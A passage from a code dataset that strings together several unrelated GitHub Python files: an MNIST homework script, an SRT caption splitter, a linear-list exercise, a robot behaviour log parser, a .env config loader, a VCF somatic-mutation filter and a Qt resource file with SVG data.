encoding: utf-8 -*-\r\n'''\r\n@File : Homework5-2.py \r\n@Contact : 1665219552@qq.com\r\n@License : (C)Copyright 2017-2018, Liugroup-NLPR-CASIA\r\n\r\n@Modify Time @Author @Version @Desciption\r\n------------ ------- -------- -----------\r\n2021/10/31 18:52 xiaoj 1.0 None\r\n'''\r\n\r\n# import lib\r\nimport numpy as np\r\nimport tensorflow as tf\r\nfrom Homework5.DataSetBean import DataSetBean\r\nimport pickle\r\nimport os\r\nimport gzip\r\nimport utils.DataUtils as dataUtils\r\ndef sigmoid(x):\r\n # y = 1 / (1 + np.exp(-x))\r\n # return y\r\n indices_pos = np.nonzero(x >= 0)\r\n indices_neg = np.nonzero(x < 0)\r\n\r\n y = np.zeros_like(x)\r\n y[indices_pos] = 1 / (1 + np.exp(-x[indices_pos]))\r\n y[indices_neg] = np.exp(x[indices_neg]) / (1 + np.exp(x[indices_neg]))\r\n\r\n return y\r\n\r\ndef predict(network, x):\r\n W1, W2, W3 = network['W1'], network['W2'], network['W3']\r\n b1, b2, b3 = network['b1'], network['b2'], network['b3']\r\n print(W1.shape,W2.shape,W3.shape)\r\n # print(\"before\",W1.shape)\r\n # np.transpose([W1])\r\n # print(\"after\",W1.shape)\r\n a1 = np.dot(x,W1)+b1\r\n z1 =sigmoid(a1)\r\n a2 = np.dot(z1, W2) + b2\r\n z2 = sigmoid(a2)\r\n a3 = np.dot(z2, W3) + b3\r\n y = sigmoid(a3)\r\n return y\r\n\r\n'''\r\n使用pickle的方式加载数据集\r\n@:param \r\n@:returns \r\n'''\r\ndef load(path):\r\n bean = None\r\n with open(path, 'rb') as f:\r\n # ((x_train, y_train), (x_test, y_test)) = pickle.load(f, encoding=\"latin-1\") # 加载数据\r\n paramList = pickle.load(f, encoding=\"latin-1\") # 加载数据\r\n bean = paramList\r\n return bean\r\n\r\n\r\n'''\r\n加载数据,x是图像,y是标签\r\n@:param mnist数据集\r\n@:returns (x_train, y_train), (x_test, y_test) ( 训练图像, 训练标签), ( 测试图像,测试标签) DataSetBean对象\r\n'''\r\ndef get_data(mnist):\r\n x_train_1=[]\r\n y_train_1=[]\r\n x_test_1=[]\r\n y_test_1=[]\r\n # ( 训练图像, 训练标签), ( 测试图像,测试标签)\r\n (x_train, y_train), (x_test, y_test) = mnist.load_data() # 加载数据\r\n\r\n x_train_1 = [0 for i in range(len(x_train))] #range(0,len(x_train))\r\n y_train_1 = []\r\n x_test_1 = []\r\n y_test_1 = []\r\n\r\n # x_train.flatten(True)\r\n print(\"x_train.shape-1\",x_train.shape)\r\n for i in range(len(x_train)):\r\n x_train_1[i]=x_train[i].reshape(784,)\r\n print(\"x_train.shape-2\",x_train.shape)\r\n\r\n x_train, x_test = x_train / 255.0, x_test / 255.0 #样本转为浮点数\r\n\r\n bean = DataSetBean(x_train, y_train, x_test, y_test)\r\n return bean\r\n\r\ndef batch(mnist):\r\n batch_size = 100\r\n accuracy_cnt = 0\r\n network=load(\"../data/sample_weight.pkl\")\r\n # bean = get_data(mnist)\r\n x_train_gz, y_train_gz, x_test_gz, y_test_gz = dataUtils.load_data_gz('../data/')\r\n # x = bean.x_test\r\n # t = bean.y_test\r\n # print(len(x))\r\n for i in range(0, len(x_test_gz), batch_size):\r\n x_batch = x_test_gz[i:i + batch_size]\r\n print(\"x_batch.shape\",x_batch.shape)\r\n\r\n y_batch = predict(network, x_batch)\r\n\r\n p = np.argmax(y_batch, axis=1)\r\n accuracy_cnt += np.sum(p == y_test_gz[i:i + batch_size])\r\n return \"Accuracy:\" + str(float(accuracy_cnt) / len(x_test_gz))\r\n\r\nif __name__ == '__main__':\r\n mnist = tf.keras.datasets.mnist\r\n result = batch(mnist)\r\n print(result)","repo_name":"yuanxiao-pro/-","sub_path":"Homework5/Homework5-2.py","file_name":"Homework5-2.py","file_ext":"py","file_size_in_byte":3500,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"29819759137","text":"import sys\nimport os\nimport pathlib\nimport shutil\nfrom datetime import datetime, timedelta\nimport textwrap\nimport math\nimport re\n\n\n# define 
variables\n\nask_path = '' # path to original .srt file\nraw_check = '' # make sure we were given an .srt file\nraw_split = [] # list to split the path and file name\nraw_path = '' # path to files\nraw_name = '' # raw file name\ndis_path = '' # full path to our temp .txt file\nfin_path = '' # full path to our final .srt file\nfin_name = '' # final distilled file name\nbatch_num = 0 # sequential batch number used in new file (will increase with every batch / split)\nbatch_work = [] # list of text lines from temp file to parse\nbatch_time = '00:00:00,000 --> 00:00:00,000' # string we will break into ms integers for maths\nbatch_time_open = '00:00:00.000' # batch open time, timedelta format\nbatch_time_close = '00:00:00.000' # batch close time, timedelta format\nbatch_open = 0 # batch total open time, in ms\nbatch_close = 0 # batch total close time, in ms\nbatch_clock = 0 # actual batch time (batch open to close)\nthis_payload = '' # text from current batch\npayload_length = 0 # number of characters in current batch\none_line_max = 37 # per FCC guidelines, the optimum max line length for a caption\ntwo_line_max = (2 * one_line_max) # per FCC guidelines, the optimum total length per closed caption (2 lines @ max length)\nbatch_shift = [] # manageable slices from oversized batch\nslice_count = 0 # number of slices\nsorted_set = '' # final chronological set of distilled and formatted batches, to be written to file\nevenflow = 0 # even split of batch time into slice time\noddflow = 0 # odd split of batch time into slice time\nslice_cent = 0 # even percent of the whole batch time each slice is\nodd_big = 0 # offset for odd slice, full slice\nodd_small = 0 # offset for odd slice, remainder\n\n# define functions\n\ndef wind_clock(adj_time):\n h, m, s = map(float, adj_time.split(':'))\n adj_time = timedelta(hours=h, minutes=m, seconds=s).total_seconds() * 1000\n adj_time = int(adj_time)\n return adj_time\n\ndef clock_even(time):\n hh = str(int(time/(1000*60*60))%24).zfill(2)\n mm = str(int(time/(1000*60))%60).zfill(2)\n ss = round((time/1000)%60, 3)\n ss = format(ss, '.3f').zfill(6).replace('.', ',')\n return (hh + \":\" + mm + \":\" + ss)\n\n\n# main code\n\ndef main():\n\n # define globals\n global batch_num\n global sorted_set\n\n # ask for the .srt file, and fault gracefully if not found, or if not .srt\n ask_path = input('*** SRT Caption Distiller *** \\n \\n Please type the full path of your .srt file, or drag-and-drop your .srt file into this window, then press \"Enter\": ')\n if os.path.exists(ask_path) is False:\n print('I was unable to find the .srt file at ' + str(ask_path))\n quit()\n raw_check = os.path.splitext(ask_path)[-1]\n if raw_check != '.srt':\n print('The file provided is not a valid .srt file. 
Please only submit a valid .srt file')\n        quit()\n\n    # set up all the necessary pathing and naming conventions now\n    raw_split = os.path.split(ask_path)\n    raw_path = raw_split[0]\n    raw_name = raw_split[1]\n    dis_path = (raw_path + '/srt_dist_temp.txt')\n    fin_name = ((os.path.splitext(raw_name)[0]) + '_distilled.srt')\n    fin_path = (raw_path + '/' + fin_name)\n\n    # we have to wrap the process in a try, because it gets confused and faults when we run out of batches\n    try:\n        # copy the chosen .srt file and rename as our temp.txt file\n        shutil.copy(ask_path, dis_path)\n\n        # line-by-line inbound process loop\n        with open(dis_path, 'r') as fin: # open our temp.txt for READ\n            batch_work = fin.read().splitlines(True) # pull content into list, broken into individual lines\n\n        # parse all batch sections into main variables\n        while batch_work: # iterate through list, until empty\n            if batch_work[0] == '\\n': # delete errant returns that sometimes get stuck at the top\n                batch_work.pop(0)\n            batch_time = batch_work[1].strip() # pull timing string, remove newline from result\n            x = 2 # reset our counter variable just in case\n            this_payload = '' # reset our payload variable just in case\n            try:\n                while batch_work[x] != '\\n': # stubbornly throws unnecessary exceptions - embedded in 'try' to quash them\n                    batch_work[x].split('\\n') # pull the line, and remove the hard return\n                    this_payload += (batch_work[x].strip() + ' ') # add this line plus a space to the payload\n                    if x < len(batch_work): # exception check for when we reach the end of the file\n                        x += 1 # increase counter to keep checking lines\n                    else:\n                        break\n            except (IndexError): # finally break free from the 'while' exception\n                pass\n            del batch_work[0:x] # remove batch from list that we're about to process\n            payload_length = len(this_payload) # get the length of the payload (character count)\n\n            # process the payload -- various methods depending on size and content of payload\n\n            # correct a common srt glitch where a space will disappear between the end of a sentence and the following capital letter\n            this_payload = re.sub(r\"(\\w)([A-Z])\", r\"\\1 \\2\", this_payload)\n\n            # one line batch - no extra processing, just increase the batch number, insert to sorted_set, and move on to next batch\n            if payload_length <= one_line_max:\n                batch_num += 1\n                sorted_set += (str(batch_num) + '\\n' + batch_time + '\\n' + this_payload + '\\n' + '\\n')\n\n            # two line batch - increase the batch number, format strings properly, insert to sorted_set, and move on to next batch\n            elif payload_length > one_line_max and payload_length < two_line_max:\n                batch_num += 1\n                this_payload = textwrap.fill(this_payload, width=one_line_max)\n                sorted_set += (str(batch_num) + '\\n' + batch_time + '\\n' + this_payload + '\\n' + '\\n')\n\n            # oversized batches - the whole reason for this script. 
Let's break the clock, slice the playload into proper-sized batches, then rebuild within the given timeframe\n else:\n # pull timestamps, convert to timedelta format (hh:mm:ss.fff), then to ms integer\n batch_time_open = (batch_time[0:12]).replace(',', '.')\n batch_open = wind_clock(batch_time_open)\n batch_time_close = (batch_time[17:]).replace(',', '.')\n batch_close = wind_clock(batch_time_close)\n batch_clock = (batch_close - batch_open)\n\n # break the batch into slices and count them\n batch_shift = textwrap.wrap(this_payload, width=two_line_max)\n slice_count = len(batch_shift)\n\n # slice time evenly to divide given time equally between slices\n evenflow = math.floor(batch_clock / slice_count)\n\n # if we have uneven slice payloads, modify the timing for the full-size slices, versus the last (small) slice, within the given time parameter\n if (len(batch_shift[-1]) <= one_line_max): # if the last slice is only one line or less\n slice_cent = round((100 / slice_count), 2) # figure out our percentage per slice, to sub-split time properly\n oddflow = round(((evenflow / 100) * slice_cent), 2) # divide the total time by the percentage of one slice\n odd_big = int(evenflow + (oddflow / (slice_count - 1))) # spread the lion's share of percentage evenly to full size slices\n odd_small = int(evenflow - oddflow) # subtract an equal total percentage portion from the total for the remainder slice, to get to 100%\n for z in batch_shift:\n batch_num += 1 # increase the batch number\n if z == batch_shift[-1]: # if this is the last loop\n batch_close = (batch_open + odd_small) -1 # increase the clock stop position by smaller amount, then reduce by 1 to compensate for drift\n else: # otherwise this is a full-sized slice, so\n batch_close = (batch_open + odd_big) # increase the clock stop position by larger amount\n batch_time_open = clock_even(batch_open) # calculate and rebuild the open clock string via function\n batch_time_close = clock_even(batch_close) # calculate and rebuild the close clock string via function\n batch_time = (batch_time_open + ' --> ' + batch_time_close) # now we can rebuild the batch_time string for this batch\n\n # format the payload and assemble the pieces\n this_payload = textwrap.fill(z, width=one_line_max)\n sorted_set += (str(batch_num) + '\\n' + batch_time + '\\n' + this_payload + '\\n' + '\\n')\n\n # advance the clock's start position, so we pick up where we left off\n batch_open = (batch_close + 1)\n\n # we have even slice payloads, so we can evenly split the timing\n else:\n for z in batch_shift:\n batch_num += 1 # increase the batch number\n batch_close = (batch_open + evenflow) # increase the clock stop position\n batch_time_open = clock_even(batch_open) # rebuild the open clock via function\n batch_time_close = clock_even(batch_close) # rebuild the close clock via function\n batch_time = (batch_time_open + ' --> ' + batch_time_close) # rebuild the batch_time string for this batch\n\n # format the payload and assemble the pieces\n this_payload = textwrap.fill(z, width=one_line_max)\n sorted_set += (str(batch_num) + '\\n' + batch_time + '\\n' + this_payload + '\\n' + '\\n')\n\n # advance the clock's start position, so we pick up where we left off\n batch_open = (batch_close + 1)\n\n # we've run out of batches, let's wrap things up\n except (IndexError):\n pass\n\n # all data is processed, overwrite everything back into the temp file\n with open(dis_path, 'w') as fout:\n fout.writelines(sorted_set)\n\n # once loaded, change the temp file into the final file\n 
os.rename(dis_path, fin_path)\n\n # tell the user that the process is done\n print('\\n' + 'The file has been processed successfully,' + '\\n' + 'and saved in the same location as your original file.' + '\\n' + 'Thank you for using SRT Caption Distiller!')\n\n quit()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"tmaaz/srt-caption-distiller","sub_path":"srt-caption-distiller.py","file_name":"srt-caption-distiller.py","file_ext":"py","file_size_in_byte":12652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16656058588","text":"# 자료구조개론 4주차 과제1\n# 선형 리스트 구현\n# \n# 미래모빌리티학과\n# 2021271402 이지오\n\n# import module for call main\nimport sys\n\n# 1. 동물 = []\nanimals_list = []\n\n\n# 2. 동물 = [동물1, 동물2, 동물3, 동물4]을 만드는 동물 리스트 완성하는 함수()\n# - 빈 칸 추가 후 insert\nanimals = [\"dog\", \"cat\", \"tiger\", \"elephant\", \"giraff\"]\n\ndef add_item(item:any) -> None:\n animals_list.append(None)\n animals_list[len(animals_list) -1] = item\n # print(f\"{item} is added to animals_list.\")\n\ndef default_array():\n # print(\"Set animals_list in Default.\")\n animals_list.clear()\n # print(\"animals_list is now cleared.\")\n for item in animals:\n add_item(item)\n \n\n# 3. 특정 위치에 새로운 동물을 삽입하는 함수()\n# - 0보다 작고, 리스트 크기보다 큰 경우 확인\n# - 빈 칸 추가 후 [맨 뒤 - 1]의 이름을 [맨 뒤]로 복사\n# - 특정 위치 뒤까지 반복\n# - 특정 위치에 insert\ndef insert_item(index:int, item:any) -> None:\n if index < len(animals_list) and index >= -len(animals_list):\n if index < 0:\n index = len(animals_list) + index\n animals_list.append(None)\n last_index = len(animals_list) - 1\n for i in range(last_index - index):\n animals_list[last_index - i] = animals_list[last_index - i - 1]\n animals_list[index] = item\n else:\n raise IndexError(\"Out of list range.\")\n\n\n# 4. 특정 위치의 데이터를 삭제하는 함수()\n# - 0보다 작고, 리스트 크기보다 큰 경우 확인\n# - 특정 위치의 자료 delete\n# - 특정 위치에 특정위치 다음의 자료 복사\n# - [맨 뒤]까지 복사 후 [맨 뒤]는 삭제\ndef delete_item(index:int) -> None:\n if index < len(animals_list) and index >= -len(animals_list):\n if index < 0:\n index = len(animals_list) + index\n last_index = len(animals_list) - 1\n for i in range(last_index - index):\n animals_list[index + i] = animals_list[index + i + 1]\n animals_list.pop(-1)\n else:\n raise IndexError(\"Out of list range.\")\n\n\n# 5. 2~4를 선택하여 각각을 수행하는 main() 함수\ndef main() -> int:\n # 초기화\n default_array()\n while True:\n try:\n # 메뉴 인터페이스 출력\n print()\n print(f\"Now {len(animals_list)} item(s) in animals_list : \")\n print(animals_list)\n print()\n print(\"===== Liner List =====\")\n print(\"1. Add item in list.\")\n print(\"2. Insert item in list.\")\n print(\"3. Delete item in list.\")\n print(\"4. Reset list to default.\")\n print(\"5. 
Exit\")\n print(\"=\" * 23)\n select = input(\"Select the menu >> \")\n print()\n\n # 메뉴에 맞는 동작 구성\n if select == '1' or select.lower() == \"add\":\n add_item(input(\"[Add] Enter the name of the item >> \"))\n\n elif select == '2' or select.lower() == \"insert\":\n index = int(input(\"[Insert] Enter the index number you want to insert >> \"))\n insert_item(index, input(\"[Insert] Enter the name of the item >> \"))\n\n elif select == '3' or select.lower() == \"delete\":\n delete_item(int(input(\"[Delete] Enter the index number you want to delete >> \")))\n\n elif select == '4' or select.lower() == \"reset\":\n default_array()\n\n elif select == '5' or select.lower() == \"exit\" or select.lower() == \"quit\" or select.lower() == \"end\":\n print(\"Good Bye!\")\n return 0\n else:\n raise ValueError(\"Wrong Input!\")\n\n except Exception as e:\n print()\n print(\"Error : \", e)\n\n\n# main 함수 호출\nif __name__ == \"__main__\":\n sys.exit(main())","repo_name":"geolee1/KUS_DataStructure_2023","sub_path":"linked_list/src/liner_list.py","file_name":"liner_list.py","file_ext":"py","file_size_in_byte":3903,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23460192946","text":"#!/usr/bin/python\n\nimport os, sys, getopt\n\nfrom .LogReaderV2 import LogReader\nfrom .LogReaderV2 import Parser\n\nfrom matplotlib import pyplot\nimport numpy\n\nclass XABSLSymbols:\n def __init__(self):\n self.values = {}\n self.decimalIdToName = {}\n self.booleanIdToName = {}\n self.enumIdToName = {}\n\nclass BehaviorParser(Parser):\n def __init__(self):\n Parser.__init__(self)\n self.symbols = XABSLSymbols()\n self.options = []\n self.current_options = {}\n \n def parseOption(self, o):\n \n if o.type == 0: # Option\n optionComplete = self.options[o.option.id]\n self.current_options[optionComplete.name] = { \n 'time': o.option.timeOfExecution,\n 'state': optionComplete.states[o.option.activeState],\n 'stateTime': o.option.stateTime\n }\n \n for so in o.option.activeSubActions:\n self.parseOption(so)\n \n \n def parse(self, name, data):\n self.current_options = {}\n \n if name == 'BehaviorStateComplete':\n message = Parser.parse(self, name, data)\n \n #process options\n self.options = message.options\n \n # process symbols\n for s in message.inputSymbolList.decimal:\n self.symbols.values[s.name] = s.value\n self.symbols.decimalIdToName[s.id] = s.name\n \n for s in message.inputSymbolList.boolean:\n self.symbols.values[s.name] = s.value\n self.symbols.booleanIdToName[s.id] = s.name\n \n for s in message.inputSymbolList.enumerated:\n self.symbols.values[s.name] = s.value\n self.symbols.enumIdToName[s.id] = s.name\n \n return self.symbols.values, self.current_options\n \n \n elif name == 'BehaviorStateSparse':\n message = Parser.parse(self, name, data)\n symbols_values = self.symbols.values.copy()\n \n #process active options\n for o in message.activeRootActions:\n self.parseOption(o)\n \n #process symbols\n for s in message.inputSymbolList.decimal:\n name = self.symbols.decimalIdToName[s.id]\n symbols_values[name] = s.value\n \n for s in message.inputSymbolList.boolean:\n name = self.symbols.booleanIdToName[s.id]\n symbols_values[name] = s.value\n \n for s in message.inputSymbolList.enumerated:\n name = self.symbols.enumIdToName[s.id]\n symbols_values[name] = s.value\n \n return symbols_values, self.current_options\n \n else:\n return Parser.parse(self, name, data)\n \n\ndef behavior(frame):\n try:\n if \"BehaviorStateComplete\" in frame.messages:\n m, o = 
frame[\"BehaviorStateComplete\"]\n else:\n m, o = frame[\"BehaviorStateSparse\"]\n\n return [m[\"robot_pose.x\"], m[\"robot_pose.y\"], m[\"fall_down_state\"]]\n \n except KeyError as k:\n raise StopIteration\n\n\nif __name__ == \"__main__\":\n\n parser = BehaviorParser()\n fileName = \"./game.log\"\n log = LogReader(fileName, parser)#, filter=headYaw)\n \n # we want only the frames which contain BehaviorState\n b = [behavior(f) for f in log if \"BehaviorStateComplete\" in f.messages or \"BehaviorStateSparse\" in f.messages];\n \n upright = filter(lambda m: m[2] == 1, b)\n fall = filter(lambda m: m[2] != 1, b)\n \n print(\"step 2\")\n du = zip(*upright)\n df = zip(*fall)\n \n pyplot.plot(du[0], du[1], '.')\n pyplot.plot(df[0], df[1], 'o')\n\n pyplot.ylabel('y')\n pyplot.xlabel('x')\n pyplot.show()\n ","repo_name":"BerlinUnited/RoboCupTools","sub_path":"VideoLogLabeling/py/parsers/BehaviorParser.py","file_name":"BehaviorParser.py","file_ext":"py","file_size_in_byte":3373,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"1716121392","text":"import contextlib\nimport os\nfrom pathlib import Path\nfrom typing import Union\n\n\nclass MapConfiKToMappingProxy:\n async def aget(self, key, default=None):\n raise NotImplementedError\n\n def get(self, key, default=None):\n raise NotImplementedError\n\n def get_mapping(self, path):\n \"\"\"\n Should return a mapping from the path given\n :param path: str\n :return: Mapping\n \"\"\"\n return NotImplementedError\n\n\nclass EnvMappingProxy(MapConfiKToMappingProxy):\n def __init__(self, path: Union[Path, str] = Path(\".\"), *args, **kwargs):\n assert isinstance(path, (str, Path)), \"unsupported path type {t}\".format(\n t=type(path)\n )\n\n if isinstance(path, str):\n path = Path(path)\n\n if path.suffix != \".env\":\n path = path / \".env\"\n\n self.environ = self.get_mapping(path)\n\n def get(self, key, default=None):\n return self.environ.get(key, default)\n\n def get_mapping(self, path):\n mapping = os.environ.copy()\n\n with contextlib.suppress(FileNotFoundError):\n with open(path, \"r\") as f:\n for line in f.readlines():\n entry = line.strip().split(\"=\", 1)\n\n if len(entry) == 1:\n entry.append(\"\")\n\n name, value = entry\n mapping[name] = value.replace('\"', \"\").replace(\"'\", \"\")\n\n return mapping\n","repo_name":"LeOndaz/confik","sub_path":"confik/proxies.py","file_name":"proxies.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"40"} +{"seq_id":"23660374739","text":"#!/usr/bin/env python3\n# extract somatic mutations.\n# cat somaticMutation.vcf | awk '/^LFYR/ {print}' | wc -l #7054\n\nf_in = open(\"sm_only80x.recode.vcf\")\nf_out = open(\"somaticMutation.vcf\", \"w\")\nfor line in f_in.readlines():\n\tif line.startswith(\"LFYR\"):\n\t\tcolumns = line.split()\n\t\thr = 0\n\t\thv = 0\n\t\thet = 0\n\t\tfor i in range(9, len(columns)):\n\t\t\tgenotype = columns[i].split(\":\")[0]\n\t\t\tif genotype == \"0/0\" or genotype == \"0|0\" :\n\t\t\t\thr += 1\n\t\t\telif genotype == \"1/1\" or genotype == \"1|1\" :\n\t\t\t\thv += 1\n\t\t\telif genotype == \"0/1\" or genotype == \"0|1\" :\n\t\t\t\thet +=1\n\t\tt = hr + hv + het\n\t\tif not (hr == t or hv == t or het == 
t):\n\t\t\tf_out.write(line)\n\telse:\n\t\tf_out.write(line)\nf_in.close()\nf_out.close()\n","repo_name":"leiyu37/Finnish_eelgrass_milleniumClone","sub_path":"01_fixedSNPcalling/24_extractSomaticMutations.py","file_name":"24_extractSomaticMutations.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"35544211013","text":"# Resource object code (Python 3)\n# Created by: object code\n# Created by: The Resource Compiler for Qt version 6.6.0\n# WARNING! All changes made in this file will be lost!\n\nfrom PySide6 import QtCore\n\nqt_resource_data = b\"\\\n\\x00\\x00%z\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22 ?>\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a<\\\npath fill=\\x22#312e\\\n2b\\x22 opacity=\\x221.0\\\n0\\x22 d=\\x22 M 858.33 \\\n310.52 C 858.97 \\\n306.87 858.68 30\\\n0.51 863.10 299.\\\n03 C 867.99 297.\\\n87 868.86 304.86\\\n 869.07 308.01 C\\\n 874.61 358.77 8\\\n79.04 409.67 885\\\n.30 460.34 C 891\\\n.17 412.67 895.6\\\n8 364.83 901.24 \\\n317.12 C 902.00 \\\n313.72 903.86 30\\\n8.57 908.79 311.\\\n05 C 911.76 313.\\\n84 911.49 318.32\\\n 912.14 321.98 C\\\n 915.50 354.47 9\\\n18.96 386.95 922\\\n.48 419.42 C 923\\\n.73 430.72 924.4\\\n5 442.11 926.57 \\\n453.31 C 934.04 \\\n408.72 939.03 36\\\n3.73 946.77 319.\\\n19 C 949.07 319.\\\n05 951.45 318.56\\\n 953.72 319.21 C\\\n 956.90 321.73 9\\\n56.24 326.52 957\\\n.19 329.98 C 961\\\n.20 363.70 965.7\\\n6 397.35 969.94 \\\n431.05 C 970.87 \\\n438.52 971.66 44\\\n6.05 973.47 453.\\\n38 C 981.15 417.\\\n59 987.43 381.50\\\n 994.49 345.58 C\\\n 995.38 341.59 9\\\n96.06 337.00 999\\\n.28 334.09 C 100\\\n3.87 332.26 1006\\\n.82 336.72 1007.\\\n46 340.42 C 1014\\\n.36 376.02 1019.\\\n63 411.95 1027.2\\\n6 447.41 C 1034.\\\n59 416.87 1040.5\\\n8 386.03 1047.45\\\n 355.39 C 1048.2\\\n2 351.86 1050.08\\\n 347.88 1054.00 \\\n347.09 C 1058.54\\\n 347.93 1059.96 \\\n353.01 1061.13 3\\\n56.84 C 1067.26 \\\n383.65 1072.71 4\\\n10.62 1079.38 43\\\n7.30 C 1085.20 4\\\n16.34 1089.65 39\\\n5.05 1094.84 373\\\n.94 C 1095.84 37\\\n0.71 1096.20 366\\\n.51 1099.21 364.\\\n32 C 1101.68 363\\\n.42 1104.50 363.\\\n66 1107.13 363.3\\\n2 C 1114.75 383.\\\n31 1120.30 404.0\\\n1 1126.67 424.42\\\n C 1127.21 424.5\\\n9 1128.29 424.94\\\n 1128.83 425.12 \\\nC 1137.67 414.16\\\n 1146.24 403.00 \\\n1154.95 391.95 C\\\n 1160.52 384.46 \\\n1168.75 378.09 1\\\n178.40 377.56 C \\\n1196.56 376.26 1\\\n214.80 377.25 12\\\n33.00 376.85 C 1\\\n238.56 377.28 12\\\n45.15 375.58 125\\\n0.05 379.16 C 12\\\n52.56 383.96 124\\\n6.69 387.05 1243\\\n.01 385.90 C 122\\\n1.34 386.65 1199\\\n.65 385.28 1178.\\\n00 386.18 C 1172\\\n.26 386.70 1167.\\\n45 390.59 1163.7\\\n8 394.75 C 1153.\\\n70 406.43 1145.1\\\n6 419.37 1134.78\\\n 430.79 C 1132.4\\\n8 433.35 1128.71\\\n 434.87 1125.30 \\\n433.72 C 1120.79\\\n 431.91 1118.54 \\\n427.13 1117.35 4\\\n22.74 C 1112.41 \\\n407.69 1108.64 3\\\n92.26 1102.89 37\\\n7.49 C 1096.71 4\\\n00.52 1092.17 42\\\n3.97 1085.88 446\\\n.97 C 1085.66 45\\\n0.87 1082.16 455\\\n.55 1077.86 454.\\\n28 C 1073.24 453\\\n.31 1073.52 447.\\\n32 1072.04 443.9\\\n4 C 1065.82 417.\\\n90 1060.59 391.6\\\n4 1054.25 365.64\\\n C 1046.22 397.5\\\n1 1040.56 429.97\\\n 1032.87 461.92 \\\nC 1032.22 466.23\\\n 1027.24 470.29 \\\n1023.39 466.63 C\\\n 1019.75 459.16 \\\n1019.13 450.63 1\\\n017.49 442.58 C \\\n1012.23 413.61 1\\\n007.57 384.50 10\\\n01.41 355.71 C 9\\\n93.63 393.18 986\\\n.88 
430.86 979.5\\\n2 468.42 C 978.5\\\n4 472.73 977.81 \\\n479.67 972.07 48\\\n0.11 C 968.24 47\\\n8.40 967.02 473.\\\n84 966.84 470.03\\\n C 961.40 429.91\\\n 957.26 389.57 9\\\n50.94 349.57 C 9\\\n44.23 391.11 938\\\n.73 432.84 932.5\\\n7 474.47 C 931.9\\\n1 478.56 930.95 \\\n482.61 929.77 48\\\n6.58 C 927.97 48\\\n6.73 924.37 487.\\\n03 922.57 487.17\\\n C 915.07 441.96\\\n 913.04 395.97 9\\\n06.44 350.60 C 9\\\n01.64 388.86 897\\\n.97 427.27 893.6\\\n0 465.59 C 892.2\\\n2 476.25 892.19 \\\n487.14 889.48 49\\\n7.59 C 889.15 50\\\n1.07 883.35 502.\\\n48 881.75 499.25\\\n C 880.23 496.86\\\n 880.15 493.83 8\\\n79.68 491.16 C 8\\\n74.49 443.34 870\\\n.43 395.38 864.6\\\n3 347.62 C 861.6\\\n2 377.85 860.02 \\\n408.19 857.69 43\\\n8.47 C 857.15 44\\\n1.88 857.28 445.\\\n60 855.69 448.78\\\n C 853.57 449.40\\\n 851.33 449.27 8\\\n49.16 449.31 C 8\\\n48.65 435.83 850\\\n.31 422.42 851.1\\\n4 408.99 C 853.6\\\n1 376.17 855.96 \\\n343.34 858.33 31\\\n0.52 Z\\x22 />\\x0d\\x0a\\x0d\\x0a\\x0d\\\n\\x0a\\x0d\\x0a\\\n\\x00\\x00\\x0b\\x0d\\\n<\\\n?xml version=\\x221.\\\n0\\x22 encoding=\\x22UTF\\\n-8\\x22 ?>\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a\\x0d\\x0a<\\\npath fill=\\x22#ffff\\\nff\\x22 opacity=\\x221.0\\\n0\\x22 d=\\x22 M 378.00 \\\n51.01 C 418.78 2\\\n3.85 468.01 9.58\\\n 517.01 10.91 C \\\n596.16 11.49 672\\\n.99 54.81 716.05\\\n 120.96 C 741.66\\\n 158.90 755.84 2\\\n04.28 757.14 249\\\n.99 C 703.76 250\\\n.04 650.39 249.9\\\n6 597.01 250.01 \\\nC 596.98 264.00 \\\n596.98 278.00 59\\\n7.01 291.99 C 65\\\n0.34 292.03 703.\\\n66 291.96 756.99\\\n 292.01 C 757.01\\\n 315.00 757.02 3\\\n38.00 757.00 360\\\n.99 C 703.67 361\\\n.03 650.34 360.9\\\n6 597.01 361.01 \\\nC 596.98 375.00 \\\n596.98 389.00 59\\\n7.01 402.99 C 65\\\n0.33 403.03 703.\\\n66 402.96 756.99\\\n 403.01 C 757.01\\\n 425.67 757.02 4\\\n48.33 756.99 470\\\n.99 C 703.77 471\\\n.18 650.54 470.6\\\n8 597.32 471.22 \\\nC 596.87 485.47 \\\n596.94 499.73 59\\\n7.01 513.99 C 65\\\n0.41 514.03 703.\\\n80 513.96 757.21\\\n 514.01 C 755.76\\\n 576.34 728.79 6\\\n37.68 684.30 681\\\n.30 C 662.85 703\\\n.59 636.37 720.5\\\n6 608.26 733.21 \\\nC 548.06 759.13 \\\n477.33 759.88 41\\\n7.00 734.00 C 35\\\n7.36 709.40 308.\\\n97 659.80 284.92\\\n 600.05 C 273.70\\\n 572.79 267.80 5\\\n43.44 266.85 514\\\n.01 C 320.23 513\\\n.96 373.61 514.0\\\n4 426.98 513.99 \\\nC 427.05 499.76 \\\n427.11 485.53 42\\\n6.76 471.31 C 37\\\n3.51 470.57 320.\\\n26 471.22 267.01\\\n 470.99 C 266.98\\\n 448.33 266.98 4\\\n25.67 267.01 403\\\n.01 C 320.33 402\\\n.97 373.66 403.0\\\n3 426.99 402.99 \\\nC 427.02 388.99 \\\n427.02 375.00 42\\\n6.99 361.01 C 37\\\n3.66 360.97 320.\\\n33 361.03 267.01\\\n 360.99 C 266.99\\\n 337.99 266.98 3\\\n15.00 267.00 292\\\n.01 C 320.33 291\\\n.97 373.66 292.0\\\n4 426.99 291.99 \\\nC 427.02 277.99 \\\n427.02 264.00 42\\\n6.99 250.01 C 37\\\n3.59 249.97 320.\\\n19 250.04 266.79\\\n 249.99 C 268.28\\\n 170.77 311.75 